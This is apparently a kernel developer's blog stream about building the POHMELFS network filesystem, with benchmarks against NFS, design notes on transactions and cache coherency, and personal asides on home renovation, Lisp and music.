It is of course practice, but even without whole tube and using only mouthpiece I can train
breathing path. Musicians have several hours per day exercises, kernel hackers about half of an hour each morning
in parallel with listening to ACDC and Metallica as an alarm clock. Mouthpiece is rather quite (noticebly
louder than usual talk though), but produces about the same resistance for air flow, so I think
it is a good training. When embouchure will be stable enough I will attach trumpet, since currently
sound frequently drops and jumps. Nevertheless I got a big progress (I think so at least) after started
such trainings recently.
My home guardian Socket although does not have ears, looks like do not like it. Alhtough he only likes
to eat.
- If you haven't noticed, I don't take "no" for an answer,
- And now please tell us step 2 in your secret plan to win friends and influence.
- WTF are you getting at?
Fun thread :)
There is actually a serious problem in kernel community, when some new idea is being implemented,
and it moves against something which sits in mind of one or another big kernel hacker out there.
When such person replies, that this is bad idea (sometimes without technical arguments), people
just stop looking at replies and do not follow arguments of the author just because they frequently do
not know area in question enough to make decision and thus rely on others.
This only works when 'others', i.e. core kernel maintainers, are good and do not base theirs decisions
on personal feeling and only get technical side into assumption. Unfortunately it is not always the case,
and political methods are used. Sometimes even only political methods are used...
Usually you will not see bad benchmark results for developing
technology, but any such result is actually a _very_ good result
for work-in-progress and not yet completed system. It allows
to see how new proof-of-concept code can be comparable
with already completed tuned and optimized system.
Conclusions from such test results in a really superior decisions.
Let's compare iozone read/reread, write/rewrite and random
read and write for POHMELFS and NFS with 8Gb test files
different record size (from 8Kb to 1Mb) on XFS over the GigE link.
I described hardware and local iozone benchmark results in details
previously.
Now its time for network tests.
Async NFS in-kernel server results.
Sequential writing is 10-15% faster for POHMELFS (and limited by underlying
fs speed), while random writing
is essentially the same and is limited by disk speed. But sequential reading
is _much_ worse for small requests. THe reason is simple: POHMELFS does not support readahead,
since it does not have ->readpages() callback, so any
sequential access ends up with set of ->readpage() callbacks,
which waits for theirs completion, which is slow, so currently readahead
is not invoked from reading path.
I could not resist to highlight, that big
sized requests are 1.5-2 times faster for POHMELFS than NFS :)
and is also limited by underlying filesystem.
One can note, that
NFS random reading results are actually better than local filesystem behaviour,
and its is better very noticebly. Why does local filesystem behave worse than
being mounted via NFS in random reading?
I believe that's because in a network case we actually have double buffering:
on client, where the most active pages are in RAM, and on server, where
readahead populated pages, which are not active (since active pages are being
read from client's cache, so they will be evicted from server's page cache,
since client will not try to read them from server), but those server pages,
which are not active currently will be accessed soon by client, when it will read
next portion of the random data, and it will be very fast access to RAM.
So we have really good caching scheme, where the most actively used pages are
in client RAM, and they are flushed to disk on server, and isntead server populated
other less active pages via readahead.
This reading behaviour is just a result of yet not completed VFS callback implementation
of the POHMELFS. With ->readpages() in place it will be faster than
NFS even in this bench. Also POHMELFS has multiple-server parallel read balancing and
simultaneous writing to them, but there are no results yet.
I already created a mind model of the optimized read and write transactions (based
on memory pools for the maximum OOM-robustness and small memory usage overhead), so
in a day or two it will be implemented in code.
Stay tuned, now its time for excellent POHMELFS results!
Screaming, drinking, cheering...
Although I was not there today, since
some friends became ill and others moved to their tasks,
it still was really cool (yesterday).
My congratulations to the team and department itself :)
Match of the century - 24 hours of footbal in my
Alma Mater.
Today Department of Quantum and Physic Electronic (which I finished
do not even remember when, but I started studying in MIPT 10 years ago) play with
axes, or theirs another name: Department of General and Applied Physics.
After about half of the match we won with +18 goals (31:13).
This happens once per year and usually I tried to move to MIPT and
watch part of the game like this year. Tomorrow will move there too of course
to met with old friends and celebrate the win!
I promised to publish POHMELFS parallel processing results yesterday,
even if they are miserable. Unfortunately there are no interesting results
at all. In the released version POHMELFS is 32bit only, since it does
not have special ->open() callback which forces to open files
with O_LARGEFILE flag to support more than 4Gb (actually only 2Gb,
since kernel uses signed size_t, which is only 31 bit large) sizes and
superblock maximum size is set to 32 bits,
so all 32 bit results are not very interesting, since having 2Gb/s random
read speed is really stupid sentence, since all reading happend from the cache.
While results with more than 2Gb are... Let me first show you how XFS and Ext3 behave
in case of random writes.
A short preface.
Hardware used in testing: 4-way Intel E7520 system (two logical and two physical CPUs)
3Ghz 32 bit Xeons with 8gb of ram, Adaptec AIC7902 Ultra320 SCSI adapter with
SEAGATE ST3300007LC 10k rpm 300 Gb testing disk. Its linear reading speed
is about 90 MB/s. Dmesg:
Kernel version is 2.6.25 (and 2.6.24 for the first ext3 test).
I used two such machines as servers for iozone
read/reread, write/rewrite and random read/write testing. File size is limited to 8Gb only,
since it is the only interesting fair case, record size varies from 8Kb to 1Mb.
Before I started 8Gb POHMELFS testing, I decided to check how local filesystem behave in such scenario.
XFS was tuned this way: (mkfs.xfs -d agcount=75 -l size=64m /dev/sdc1;
mount -o logbufs=8,nobarrier,noatime,nodiratime,osyncisdsync /dev/sdc1 /mnt/)
Ext3 was created and mounted with default options on machine with only 4Gb of RAM though.
So, testing.
Here is a results table from iozone (before I interrupted it) with read/reread, write/rewrite
and random read/write tests for XFS (either default, or tuned like on link above).
Do you really want to know ext3 speed? Pregnant kids and women should skip next paragraph.
I interrupted test after almost 2 (!) hours or random writing
of 8Gb file with 8Kb records on default ext3. Test was not completed and I do not really
know its performance (note, that this machine has only 4Gb of ram, other hardware details were
described above), but it will be less than 1 MB/s.
Ext4 behaves much better in this aspect (ount options: rw,noatime,data=writeback,extents):
I hate laziness, but sometimes drop into that hole... So last couple of days
I just stupidly wasted by time (well, I read Lisp and failed to find GTK binding for CLISP,
made some code and kernel bug fix, but that does not count).
Today lazyness started to be really boring, so I made some small progress in
POHMELFS
parallel processing.
It got ability to send transactions to multiple servers by default and balance reading
between them (so far it does it always from the first server, in case of error it switches
to second, but it is trivial to change). This was implemented via special routes for each
transaction, which are stored per network state, so if one of the servers did not answer,
we would not resend data to others. It also makes trees smaller, which should allow faster
reading in case of lots pending writing transactions.
Code is in testing stage currently, I will complete read balancing tomorrow and test it against
multiple servers on different machines, when data is placed on disk, so that random access
would be slow. Having two servers I exect to get linear speed increase. If test will be disk
IO bound, it is possible to add multiple servers on the same machine, so that each server would
run on its own disk (I have two resonable fast SCSI disks on each testing machine).
Results will be published here of course (well, even if they are miserable :).
#!/usr/bin/clisp
(defun f (m)
(do ((k 0 (1+ k))
(c 0 n)
(n 1 (+ c n)))
((eql k m)
(format t "~r" c))))
(f 317)
Guess the result:seven hundred and ninety-three vigintillion, five hundred and ninety-one novemdecillion, four hundred and seven octodecillion, eight hundred and four septendecillion, one hundred and fifty-one sexdecillion, nine hundred and twenty-six quindecillion, five hundred and ninety-three quattuordecillion, seven hundred and ninety-three tredecillion, forty-two duodecillion, one hundred and twenty-six undecillion, eight hundred and ninety-one decillion, one hundred and twenty-eight nonillion, eight hundred and nineteen octillion, six hundred and ten septillion, seven hundred and ten sextillion, one hundred and forty quintillion, one hundred and forty-five quadrillion, thirty-seven trillion, nine hundred and fifty-eight billion, two hundred and seventy-three million, seven hundred and seventy-seven thousand, three hundred and ninety-seven
Irish Tullamore Dew helped this
POHMELFS
release to see the light.
Short changelog:
Full transaction support for all operations (object creation/removal, data reading and writing).
Data reading transactions are not optimal yet and will be improved in the next release (although fast).
Data and metadata cache coherency support. More details on how this is implemented
one can find in appropriate
section.
Transaction timeout based resending. If given transaction did not receive reply after specified
timeout, transaction will be resent (possibly to different server).
Switched writepage path to ->sendpage() which improved performance and robustness
of the writing.
Preliminary support for parallel data processing. Code to write data to multiple servers in parallel
and balance reading between them was imported, but is not used right now.
Fair number of bugfixes.
Next release is scheduled for the beginning of the next month, and will likely include following features:
Improved reading transactions.
Server redundancy extensions (ability to store data in multiple locations according to regexp rules,
like '*.txt' in /root1 and '*.jpg' in /root1 and /root2.
Client parallel extensions: ability to write to multiple servers and balance reading between them.
Code was imported to the current version, but not enabled yet.
Client dynamical server reconfiguration: ability to add/remove servers from working set by server command
and from userspace.
Start generic server distribution development.
As usual one can grab the latest source from
archive or
GIT tree.
But no, it is scheduled for tomorrow because of the very interesting way I decided
to implement reading transactions. The way it works right now is quite miserable,
so I want to clean things up and make a really good patch.
Page reading code will create single transaction for the bunch of pages and will schedule
next one if pages are not yet received instead of waiting for transaction to be completed,
and only wait at the very end (if needed). With addition of
async copy
from receiving kernel thread into reading userspace via copy_to_user() (in todo),
this will became the fastest possible way of doing reading over the net I think.
So far changelog contains following items:
Full transaction support for all operations (object creation/removal, data reading and writing).
Data reading transactions are not optimal yet and will be improved in the next release.
Data and metadata cache coherency support. More details on how this is implemented
one can find in devel
section.
Transaction timeout based resending. If given transaction did not receive reply after specified
timeout, transaction will be resent (possibly to different server).
Switched writepage path to ->sendpage() which improved performance and robustness
of the writing.
iput() is a very tricky call in Linux VFS,
besides the fact that it drops inode when its reference counter
reached zero, it also waits until all associated pages are
flushed to storage too.
POHMELFS uses singler per network state (network connection structure)
thread, which only reads async replies from the server, so it is possible,
that reply which requres iput() (for example create command
reply) will happend in parallel with object removal, so inode will be deleted,
but yet not freed. When reply is received and iput() called,
it will try to free inode and wait until all associated to its mapping pages
are synced. But page sync happens on reply to another command (consider for
example several writeback transactions), which can not be processed, since thread
is waiting them to be completed. This problem can not be fixed by introducing
multiple threads, since each one can be exactly in the same situation simultaneously.
In turn we should not allow to grab inode and free it in the receiving path.
This is ok for writeback transactions, since inode can not be freed until pages are synced,
so just by holding pages we are able not to lock, but object creation for empty files
or directories does not have pages attached, so they have to be synced with special
transaction. There still can be a problem with empty file though - some pages can be
attached and it can be removed while system waits for creation transaction complete,
but actually we do not need to know about that - we shuold not grab inode it all,
since transaction already contains all needed into, namely inode number, so we can lookup
inode (if it still exist) and mark it as created without need for lock-prone grab/put.
This bit took me last three days, during which POHMELFS moved to non-blocking receiving and
timeout-based sending (and returned back), it got scanning 'watchdog' which resends trasactions
if they were not acked after some time and eventually dropes them if they still does not get
a reply, POHMELFS got couple of new operations supported and likely something else to existing set
of features implemented to date (full transaction support for all operations
and data and metadata coherency protool were added for the next release).
New release is scheduled for the end of the week, and there is no readpage transaction support yet...
So, stay tuned!
$ clisp
i i i i i i i ooooo o ooooooo ooooo ooooo
I I I I I I I 8 8 8 8 8 o 8 8
I \ `+' / I 8 8 8 8 8 8
\ `-+-' / 8 8 8 ooooo 8oooo
`-__|__-' 8 8 8 8 8
| 8 o 8 8 o 8 8
------+------ ooooo 8oooooo ooo8ooo ooooo 8
Welcome to GNU CLISP 2.42 (2007-10-16)
Copyright (c) Bruno Haible, Michael Stoll 1992, 1993
Copyright (c) Bruno Haible, Marcus Daniels 1994-1997
Copyright (c) Bruno Haible, Pierpaolo Bernardi, Sam Steingold 1998
Copyright (c) Bruno Haible, Sam Steingold 1999-2000
Copyright (c) Sam Steingold, Bruno Haible 2001-2007
Type :h and hit Enter for context help.
[1]> (defun test-func () (format t "It's a test func"))
TEST-FUNC
[2]> (test-func)
It's a test func
NIL
[3] (exit)
Bye.
This one has, imho, the less ugly command line... And I'm against SLIME
and Emacs. Also tried SBCL, GNU CL and something else, but likely CLIPS will
stay.
Instead of sleeping (it will be time to wake up soon in Moscow slums) or at least
catching
POHMELFS
bugs (last several days were solely devoted to this task and fair
number of them were fixed as long as some interesting features introduced (probably new),
so likely new release will see the light later this week),
I'm drinking some beer and making first steps into this. So far looks quite new and probably
interesting, but every entrance article about it I read told, that if you are after 25 years old,
it is likely impossible to change something in your perception. I'm after, but think that
it will be fun and probably will become a really good tool for me.
The more I think about it, the more interesting tasks (as long as those I'm already thinking
about like
CAPTCHA) I find...
It was rather simple task due to async event processing support.
Each time client creates, reads or writes object to server, information about
its interest is stored on server. When any other client updates the same
object (like changing attributes or writes data), all interested clients
get notifications with new data (new attributes, or in case of writing
possibly new size and flag, which page has to be fetched from the server,
since it is not valid anymore). Writing happens during writeback as before,
so commands like "echo Some_message > /mnt/file" immediately
syncs size of the file to zero and after some time writes there actual data,
when system will decide to start writeback.
Also ported all but one commands to transaction mechanism, which means
they all will be resent if currently active network connection goes down.
Although most of the commands are not synchronous, and thus will not be resent after
timeout, this can be trivially changed if there will be major demand on that.
Only reading has not yet been ported to transaction model, which is a next task
to complete. This transactions have to be synchronous, since we do want to read
data, while do not actually care about full directory content.
This changes have to be seriously tested and all problematic places to be resolved,
for example they slow metadata operations noticebly, since now system
sends a message each time new object is created, although kernel archive
untarring now takes about 5 seconds against previous 2-3 including sync
on 4-way machine with 8gb of RAM and it is still not comparable to 30+ seconds
for async NFS, it has to be investigated further.
After full move to transaction model and cache coherency testing (that model
may be not complete for some usage, since locks are not yet supported),
POHMELFS
will make its first steps into distributed area...
So, server now contains all metadata information about updated object on client,
pohmelfs_setattr() is synchronous for remotely read inodes
and for already synced indoes, created originally locally. It does nothing,
if object is not yet synced to server, since syncing will provide that info
itself.
The only missing thing is to asynchronously broadcast that data to other clients, which requires
to create a cache of objects to be interesting for given client, each client will be automatically
added into group of interests when it lookups object, so when attribute for given object is being
set, update will be sent to interested parties. Client will be dropped from group of interests, when
it drops appropriate inode locally (which will force sending a special message).
I installed vater system for the shower and thought to install
the whole cabin, but found (as usual) that I do not have drills
for the ceramic tiles. So, that will be postponed for a while.
Also I expect glue for ceramic tiles to be delivered today (as long
as brick tiles), so that I can start hall granite covering. Although
I'm a bit tired after water system installation, which took major
part of the day.
It is actually simple task, but only when you have simple access to
all parts. Now imagine a 10 sm thick wall, where you managed to drill
two holes, each one about 2 sm in diameter (less than two fingers thick).
In a meter below-left there is a bigger hole for sanitary (about
15x15 sm). Water system hatch is located 2.5 meters right to this.
Task is to put thin water tubes from water hatch to two small holes,
but that splitter would be installed near bigger sanitary hole. Without
direct access to any tube (you can only feel it, can not see) you have to
connect them (also need to mention, that it is quite hard to put
both hands into bigger hole for sanitary system) via different connectors
using spanners.
I've completed the task, although not sure if it is really safe. That was
challenging, and power sucking, so probably I will just slack this evening
and hack some bits of captcha.
Will also cover my table with the last colour level (yes, yes, it is still
not done) and/or fill second varnish layer for x-shelves (they look really cool
after mordant and varnish)...
After healthy discussion
started after my announcement of the second POHMELFS release,
its time to highlight main ideas settled in the thread.
First, POHMELFS will be moved into parallel distributed filesystems, but still
being very good as network filesystem. In particular, that will include ability
to read data from one of the connected server (not particulary from currently active,
how its done right now), writing will happen to all connected servers simultaneously
(and transaction will be committed after all servers returned completion acknowledge).
Protocol will be extended to support dynamic addtion and removal of the servers to/from
currently connected group. Probably there will be some kind of a status messages for servers
(i.e. going offline, do not send me data, or I'm becoming slow, do not read from me
and so on). It will be done in addition to cache coherency messages (I'm yet to implement,
but because of other tasks, this was a bit postponed, probably to weekend), which
will include two types of requests: page invalidation and inode update (that will
also mean that POHMELFS will start supporting attributes (maybe even extended),
right now it doesn't :). Such cache coherency protocol should scale better
than classical MOSI (and its derivatives) and particulary better than pNFS spec
proides (leases to operations for some servers), since it is still possible to work in
parallel with the same file, especially without any overhead of data processing
does not cross different client boundaries, but it has to be tested in practice.
POHMELFS server will be extended to support distributed facilities. Very likely it will
be some kind of PAXOS algorithm, although probably in its very limited mode for the beginning.
So far it will be really simple, so that I could touch all its corner cases and found
optimal development strategy.
All client extensions are rather not that complex, although not always trivial,
so that should not take too much time, so probably you will get something interesting
soon.
Server extensions will be a bit slower, since I will start essentially from the distributed
system ground and gradually move upstairs.
Irish Jon Jameson (6 years of experience, really good stuff)
brings us this new POHMELFS release.
Main features include:
Fast transactions. System will wrap all writings into transactions, which will
be resent to different (or the same) server in case of failure.
Failover. It is now possible to provide number of servers to be used in round-robin
fasion when one of them dies. System will automatically reconnect to others and send
transactions to them.
Performance. Super fast (close to wire limit) metadata operations over the network.
By courtesy of writeback cache and transactions the whole kernel archive can be untarred by 2-3 seconds
(including sync) over GigE link (wire limit! Not comparable to NFS).
The nearest roadmap includes:
Full transaction support for all operations (only writeback is guarded by transactions currently,
default network state just reconnects to the same server).
Data and metadata coherency extensions (in addition to existing commented object creation/removal messages).
Server redundancy.
One can check out POHMELFS homepage
for more details. You can download latest release (against 2.6.25 kernel tree) from
archive or
GIT tree.
I moved to development shop and got zillions of stuff there
including various colours for ceiling in kitchen and room's ceiling
plinth, ordered brick-like tiles for kitchen (about one third of
walls there will be covered with bricks), got some intrument
(like rubber hummer for the tiles), ordered glue for the
ceramic granite for hall, also got a shower (yumi, my shower
cabin was delivered today too) and related stuff for water
system installation.
By the original plan, I wanted to isntall shower cabin today, but getting
into account current time, it is too late for loud work,
so I will proceed with my table instead. It will be completed
today, or call me a ... whatever you like (out of curiosity,
is there an english undecent word dictionary? I know russian
one exists).
If things will move fast, I will also cover with varnish my X-shelves,
and probably will make some photos...
With new transactions and new waiting mechanism (see below)
system now untars the whole kernel tree in less than 3 seconds
over the GigE link (including subsequent sync, which
takes less than second always), while async NFS (remote side is tmpfs in both cases)
performs that in a bit more than 30 seconds.
In addition POHMELFS write speed is 125 MB/s (wire limit) vs. less
than 90 MB/s in NFS (dd from /dev/zero
with 1 MB block size and 1000 blocks).
That's what I call a good result.
Transaction mechanism invoked in writeback path is now completely
async too, i.e. it does not wait until remote side confirms that
transaction was received and processed, but writeback does not drop
transactions after sending function returned, instead it stores it
in the in-flight storage and proceeds with the next one.
Transaction can accumulate up to 90 pages in a single frame.
When reply is received, async thread searches for given transaction and
complete it (unlocks page, although it can be done in writeback,
since page is being copied, cleanup writeback bits, drops it from
appropriate radix tree and drops reference counter). If transaction
was not sent due to some error it will be tried to be sent to different
servers, if some error was returned from the server, it will be resent
to different ones. Since original writeback path does not know about
transactions in-flight anymore, any timeout has to be checked by
dedicated thread (or workqueue), which will detect too old transactions
(by simply checking them from the beginning, since each new transaction has
incrased id) and resend them to remote servers.
There is a small problem though - if object size is more than single
transaction can accumulate (90 pages), it will be split into several
transactions, where first one will contain object creation command
and some data to be written, while others will contain only data.
If server runs multiple threads per client (default is one though),
it is possible that not first transaction will be processed first,
so server will write some data into non-existent file, so transaction
will fail. There are two ways to fix this isuue: either wait in writeback
on client while creation transaction is completed, and then send all others
like described above, or add creation command into every subsequent transactions
until object is created on the server (special bit is set on local inode
in that case). Likely the latter is better case.
POHMELFS
just switched to faster transactions allocated one-by-one with
even smaller overhead (although it does not use kernel_sendpage()
for page sending yet, it copies data).
System does not serialize after all transactions are completed
(it waits after each one), but with
new transaction allocation it is 1.5 times faster: 98MB/s vs. 64MB/s,
note that without waiting for transaction completion it gets full wire speed of 125MB/s
with 1500 byte MTU. And it is with highmem pages and thus slow kmap()
of each one, and unmap after completion. I do not use ->sendpage()
since it will force to split proper set of iovecs into mixed
calls of kernel_sendmsg() and kernel_sendpage(),
which I want to avoid so far. Now it is (again) faster than NFS, but I want to move further.
So, solution is rather trivial: wait until several transactions
are completed. There is the whole infrastructure already there - in-flight transaction
storage, per-transaction completion and destruction callbacks, proper reference counting
and async completion.
Still only writing transactions are used (i.e. reading/lookup and others will not
redirected to different servers).
There are some bugs of course, but that's the first development version after all.
Just in case you will notice some delay in filesystem or network development,
reason is simple. I decided to devote some time to new captcha cracking problem, namely this
ones:
The reason is simple, I want to test my captcha breaking
ideas on something which is real.
And also I was frustrated by theirs abuse team, which was not able to
fix spam filter based on messages I sent them (bounce and original, just like requested).
It is pretty unlikely though that something will appear anytime soon, but I do want to test some ideas...
POHMELFS
just got full transaction support. So far it is only used in ->wrteipages()
callback, which is invoked by writeback mechanism. POHMELFS uses lazy transaction support,
namely it waits after each transaction, which includes header and data to be written for at most
14 pages, 14 is a magic number of pages, which corresponds to struct pagevec size,
used by generic writeback, transaction size is limited by mount option and is 32 pages by default.
Performance was dropped from 125 MB/s down to 64 MB/s, which is not acceptible.
Main problem is of course waiting for transaction to be completed (i.e. completion message from server).
There should not be per transaction waiting, instead writeback has to allocate as much transactions as
needed and proceed one after another, and only start waiting for them, when there are no more
pages to be written. This is the next task.
Transaction mechanism allows quite simple reconnection to different master servers in case of failure,
and rollback of the failed transaction. For example one can provide different number of main
servers (which have to be in sync with each other and be able to be synchronized themselfs,
or they just can use shared storage), so POHMELFS client will switch between them if current
one has failed. System will detect it and reconnect, if reconnect fails, next server will be used
and the whole transaction will be resent there.
It is also possible to write transaction to different server on demand (it may or may not to be connected
already, but it has to have address structure, so far it is only obtained during pre-mount configuration),
which is a prerequistic for parallel data processing. One can create a simple patch to write transactions
one after another to severs in round-robing fasion.
Right now only write transactions are used (and can be combined with object creation if needed), read ones are pending
as long as multiple parallel transactions (which is not complex, but main task is how to wait them all to be
completed, very similar code is used in pohmelfs_aio_read()).
There is also pending task of cache coherency support (server side originated messages
to clients, which used the same pages, which another client is writing into,
also including metadata coherency messages like uid/gid/inode size and other changes),
it is not that complex task, and mostly requires server modifications.
It is heavily based on how netlink is implemented in Linux kernel.
Besides the fact that it is likely the most ugly and complex protocol
among communication models supported by the kernel, it is exactly the
most effective, extendible and feature rich one.
This model is based on the attributes, which are embedded into
the message. Each attribute has header, which includes size
of the attached data. So, one can put
effectively unlimited amount of data into any message (limited only by
size field and practical assumptions of the communication), and it is possible
to create message, which will contain any number of different attributes.
The main problem of the netlink is its padding and alignment ugliness.
Protocol tries to get the every bit out of the communication, so there is huge
amount of very hairy things there.
I like to drink and (un)fortunately I got pretty bad quality drinks some times,
but I'm absolutely sure, when Alexey Kuznetsov designed netlink attrubute alignment
policies he had really bad hangover after likely the ever worst crap he drunk.
So, netlink attributes are very ugly, but you can extend it how you like.
The same applies to POHMELFS transactions.
You can put any new attribute into the transaction in a very trivial manner (I worked
with netlink alot, even created
kernel connector
to simplify kernel development side, so I know that taste), although transaction size is limited,
it is controlled only by mount option (default is 32 IO vectors each one
of PAGE_SIZE (4k on x86) in one transaction).
Thus one can easily implement for example any protocol security labeling,
just add new per-packet attribute.
So, it is easily possible to infinitely extend communication protocol with full backward
compatibility.
The only thing missing is photo skills...
But I work on it.
After I've spent quite a lot of money I suddenly decided that
it is a really good feeling - to have what you want, no matter what the price is.
I can not afford some things, but looking really closely I've decided
that having lots of smaller really cool stuff is better (for now) than collecting
for a (really) long time to get something really big. I already did that,
now its time for smaller every-day fun :)
So, no bike for now. I was torn between Honda CBR 400-600, BMW K1200 or around,
or classical chopper models, no Harley of course, but... Anyway I'm not
able to register it and get bike numbers, and I do not have a bike driving license.
The same applies to cars (what I already had I really do not want to get again, but what I want
requires some). So, my simple stuff.
POHMELFS
just got initial transactions support and ability to connect to multiple master servers.
Master servers are those, which will say, where data is placed. Essentially
they are the same severs which may provide that data, but main server addresses are
provided during pre-mount configuration time, and data server addresses will be provided
by main servers (if main ones will not want to return data) in run-time.
Also main servers can be used to request data in parallel or to switch between them,
when curently active one has failed.
So far it is a theory, practice is rather miserable: POHMELFS client connects to
multiple servers, but works with only one. Errors are detected, and switch to the next
server can happen, but it is not done. Since there is a serious problem with this
approach: neither server nor client support
ACID for data being written.
Here we come to transaction introduction: it is multiple commands wrapped into
single atomic operation. In case of error during transaction
write, the whole one will be resent to different server (or the same one after reconnect).
This is rather simple (although transactions are not supported by server and client
does not wrap any command into it yet), but it still does not solve ACID problem.
Since POHMELFS has writeback cache, all its writes never reach server, instead writeback
is scheduled by the system, and it starts writing pages to the server. Current POHMELFS implementation
uses only ->writepage() method, which is invoked for each page.
It does not require server to return explicit acknowledge, that page was written,
instead it relies to underlying transport protocol (like TCP) to handle guaranteed delivery,
so data can be queued somewhere when connection was dropped, so POHMELFS client
does not know if data was really written or not. Having per-page acknowledge can fix
ACID problem realy trivially, but that may (or may not) end up with severe performance
degradataion. As a better solution I consider own ->writepages()
implementation, where each transaction will contain multiple pages to be written
and thus smaller amount of explicit acks from server to be received, and thus smaller performance
degradataion. In case of failure whole transaction has to be resent to different server of
course.
Server does not support data mirroring to multiple root directories yet, so actually
not too much is implemented from above description, but transactions and multiple
server connections exist and soon client will get support for reconnection and proper
transaction processing.
Transaction support will be added into kernel client.
It is possible that it will be exported to userspace (thus
it will be synchronous write-through operations).
Also kernel client will get locking support (fcntl()
ones first, then more fine-grained ones), this is different from
byte-range
read/write locking, which will be done on server. It is possible to export
it to client too (and will be part of POHMELFS locking API actually, which will
be used for fcntl() too).
The simplest case is data invalidation in client's cache (i.e. if one client
issued a writeback for given page, it has to be marked as not up-to-date on other
clients). Likely it will be done at the beginning of the next week. So far it
will be the last cache coherency item. Task is relly simple because of
asynchronous processing of all data in kernel client. Server will have
to store not only index of directories to watch for object changes there,
but also per-object set of pages, read by client, so that appropriate
users could be notified, that page is no longer up-to-date and has to
be refreshed.
Userspace server will get parallel and distributed facilities. Parallel processing
will be done first by allowing lookup and readdir callbacks return inormation
about objects, which will contain address of the server where object is actually
located, so that server could read, write or check status there. So far the whole
file will be stored on a server, i.e. for the first implementation there will not
be a possibility to store half of the file on one server and another half on different
one. Then it can be extended.
Server will get ability to store data on different root directories (so that client
was not able to see shadow copies). There will be simple regexp policies for data storing,
for example '*.jpg' has to be stored in root1 and root2, '*.txt' only in root1 and so
on. Each root directory can be local or remote mounted one, userspace does not care
about this issues.
Main part is already completed: I have a vision of what system has to provide and how
it will look like, so with good design of the low-level mechanisms it becomes
a doable task for the predictible timeframe.
This is a high performance network filesystem with local coherent cache of data and metadata.
Its main goal is distributed parallel processing of data. Network filesystem is a client transport.
POHMELFS protocol was proven
to be superior to NFS in lots (if not all, then it is in a roadmap) operations.
Basic POHMELFS features:
Local coherent (notes 1 and
2) cache for data and metadata.
Completely async processing of all events (hard and symlinks are the only exceptions) including object creation
and data reading.
Flexible object architecture optimized for network processing. Ability to create long pathes to object and remove arbitrary
huge directoris in single network command.
High performance is one of the main design goals.
Very fast and scalable multithreaded userspace server. Being in userspace it works with any underlying filesystem
and still is much faster than async ni-kernel NFS one.
Roadmap includes:
Server extension to allow storing data on multiple devices (like creating mirroring), first by saving data in several
local directories (think about server, which mounted remote dirs over POHMELFS or NFS, and local dirs).
Client/server extension to report lookup and readdir requests not only for local destination, but also to different
addresses, so that reading/writing could be done from different nodes in parallel.
Strong authentification and possible data encryption in network channel.
Extend client to be able to switch between different servers (if one goes down,
client automatically reconnects to second and so on).
Async writing of the data from receiving kernel thread into userspace pages via copy_to_user() (check development tracking
blog for results).
From my developer's point of view Solaris first sucks because of its
contributor agreement.
There is no way I can devote my time to organization, which will get my work for free
and do whatever they want with it without my opinion as author (Actually the same
applies to BSD-style at some degree. Yes, that can be trivial greediness).
It is not _that_ bad OS, but there is no known practice in modern medcine of deadman awakening.
Slolaris has its niche, but that's it, although Linux can be tuned to be faster (or if it has
some bugs, they can be fixed) in that areas, but that does not matter, people who make
decisions already know that they want.
Pseudo openness of the Solaris is just a marketing noise. Those who want to hear it will hear
just that, no matter how things are in real life.
Is scheduled for tomorrow, today I have to prepare myself for it.
The whole idea and implementation started during fun new year vacations,
so I have to repeat process at least at some degree...
This release will not include direct writing to userspace from async thread,
since this approach happend to be really non-trivial. What I
described
for the page fault handling works only for the first fault, when page is populated into
the table, it can be referenced and written into and thigs just work. Problem
happens when the same page used for the second read (i.e. new try from the userspace,
for example if to increase size of written data to more than two pages, 'cat'
will use the same two pages to read data). With the second write from the kernel there will be
page fault again, although page exists in table, and fault can not be handled
(at least its reason will not be removed, since it will happen again and again), since
page table entry looks really good for the system, but not for the CPU.
I checked two cases: usual copy_to_user() from kernel on behalf of
userspace thread invoked a read syscall, and the same code, but copy was performed
from the different thread. Page table entry (pte) looks very similar in both cases
(in regards of all flags at least), but fault happens for the second write into the same
page always, when thread's mm context was changed to point to original userspace one.
This does not change if userspace thread was or was not scheduled away from its CPU.
Difference from get-user_pages() in this part is mainly the fact, that resulted page is locked
in the kernel (by increasing its reference counter at least), but I still want to produce the same
behaviour as usual page fault during copy on behalf of userspace thread.
So, I stuck with this problem, but since it is very interesting I will find a solution.
Meanwhile, this release will include following things:
POHMELFS client. Full client side caching. Async operations for all major events
(not including copy_to_user() hack described previously, but just async
notifications an copy on behalf of original userspace thread).
Support for usual files and directories only, special files like
device files or pipes are not interesting at this point, and are quite simple to implement, but
so far there is no need for that. Client has support for object creation/removal
cache coherency messages.
POHMELFS userspace server. Onject creation/removal cache coherency messsage broadcasting will
be commented out, no locking.
It happend to be really trivial. Even no VM hacking :(
First, some background on how copy_to_user() works on x86.
Its asm looks pretty simple (and it is very small, check
arch/x86/lib/usercopy_32.c:__copy_user()),
so I always wondered how it can handle missing-page-exception,
when userspace page was swapped out.
Things live in small part of the function: .section __ex_table,
this table contains two values: place where exception happend, and fixup address
(it is just instruction positions). Linker puts this table into special section,
accessible by page fault handler do_page_fault(). In some
cases page fault path is never executed, code just searches for page and locks it,
even if it is already in the table (that is why get_user_pages()
is at best as fast as copy_to_user()). This happens when
WP bit is not set and does not work
(a speculation only though, derived from __copy_to_user_ll()
and Intel F00F bug errata).
When WP bit works, we have usual copy_to_user(), which will
fault if there is no destination page, and do_page_fault() eventually
will be called. After number of checks system determines that it is exception
in kernel mode and if there is above exception table (which is true for
copy_to_user()), it tries to fix things up.
Here we come to essentially the same code, what is called in get_user_pages():
we locate VMA for failed address and insert new page into page table, this involves allocation
of all those strange 3-letters abbreviations: pgd, pud, pmd and pte ('and' is not VMM abbreviation yet),
I know what two or three of them mean, but completely forgot pud, on 4 level page table
it is hard to recall which two are the same, since iirc x86 has only 3 levels.
If page was swapped out, it will be brought back and eventually fault handler will
try to fix things up via fixup_exception(), which will
replace EIP with appropriate value from the section table described above, so that
CPU will return back to __copy_user() code and continue (or not, depending
on fact that page exists or not) its execution.
So, how to hook into above mechanism and allow completely different process to write data
into userspace? Quite trivially: above fixup (VMA searching and 3-letters abbreviation allocations)
happens for particular mm_struct, which contains VMA list, page table lock
and other (likely very) essential information to handle memory management. This structure is obtained
from the curent thread executed on the CPU, so by replacing mm_struct in our kernel thread with
userspace thread's one, we can safely copy data to and from userspace. There is a race of course,
when userspace thread will want to access its own mm_struct (copied to kernel thread) for example
calling mmap() or copy_*_user() from kernel, so we have to be careful and
properly guard against that.
Example code which does copy to userspace from kernel thread can be found in
archive. Just
replace kernel path in Makefile to your own, call make and insert module.
Each reading from /dev/tcopy file will end up with copy of data from kernel
to userspace in dedicated kernel thread.
While moving home I thought a lot about cache coherency issues.
